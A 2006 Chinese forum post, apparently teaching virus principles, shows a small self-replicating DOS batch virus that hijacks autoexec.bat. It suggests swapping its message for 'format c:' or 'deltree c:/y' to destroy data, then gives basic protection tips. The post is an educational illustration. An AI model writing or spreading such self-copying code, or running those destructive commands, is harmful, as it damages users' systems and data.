计算机病毒原理与防范课程是？

11 |

0 | 2006-11-27 10:53:26 | 显示全部楼层 |阅读模式

计算机病毒是指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据，影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。举一个“hello word”例子。下面是一个简单的DOS批处理病毒源程序autoexec.bat（假设从A盘启动）：程序语句程序注解 IF exist c:\\autoexec.bat goto Virus REM 首先检查时机 Goto No_Virus REM 若时机不成熟则潜伏 :Virus REM 时机成熟时（子程序） c: REM 转到C盘 ren autoexec.bat auto.bat REM 将正常文件改名，准备冒名顶替 copy a:\\autoexec.bat c:\\ REM 自我复制，开始繁殖 echo Hello Word! REM 病毒发作，表现症状 :No_Virus REM 正常程序入口 a: REM 转回A盘 /auto REM 执行正常程序 pause REM 暂停等待按任意键继续这个程序非常简单，但却包含了计算机病毒的典型结构，引导部分、传染部分、激发部分等五脏俱全。其触发机制是：C盘存在autoexec.bat文件，当我们用带有此病毒的启动软盘启动微机时，若C盘也有autoexec.bat文件，则病毒将C盘原autoexec.bat文件改名为auto.bat，把自身复制到C盘并显示“Hello Word！”。如果按以前的分类，它可以算是个良性病毒（但再良的病毒都要占用系统资源）。当然它还无加密和没有严重破坏系统的行为，但要是把echo Hello Word！改为format c:或deltree c:/y等那就…… 特此警告：学习病毒原理只是为了认识病毒，以达到能够清除病毒之目的，若谁以此制造病毒遗害人间，败坏门风，必遭天谴！)防范：我简单讲一下！ 1：打所有的系统补丁。 2：更改管理员用户名，设置密码！不用自动登录功能。 3：取消打印机共享，屏蔽Activex，停用一些可以被黑客利用做后门的系统服务。 4；用漏洞扫描工具（瑞星漏洞扫描或金山的）扫描电脑不安全设置。 5：安装安全软件：装卡巴：关掉监控，备用扫描对付加壳病毒装NOD32：用来监控，对付被修改特征码的病毒装ZA：关掉邮件出入监控，间谍功能，自动升级功能，缓存自动清理功能，设置为全面隐身装冰刃：对付隐藏木马装QQ专杀：对付QQ病毒装EWIDO：对付间谍，木马病毒装世界之窗浏览器：我个人觉得最好的浏览器！ 6：有条件的话装WINDOWS2003，设置一下，也适合个人， 2003很关键的一点优势就是装两个杀软不冲突！另外03的特点就是稳定和安全

使用道具举报

返回列表发新帖

千问

主题	0 回帖	4882万积分

论坛元老

Rank: 8 Rank: 8

积分: 48824836

回复楼主返回列表

问答

热门排行